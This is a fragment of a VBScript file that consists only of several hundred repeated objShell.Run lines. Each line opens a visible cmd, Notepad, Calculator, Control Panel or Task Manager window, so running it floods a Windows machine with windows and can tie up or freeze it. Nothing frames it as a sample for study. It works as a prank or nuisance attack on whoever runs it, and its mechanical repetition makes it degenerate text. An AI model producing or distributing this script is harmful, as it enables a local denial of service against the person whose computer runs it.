objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
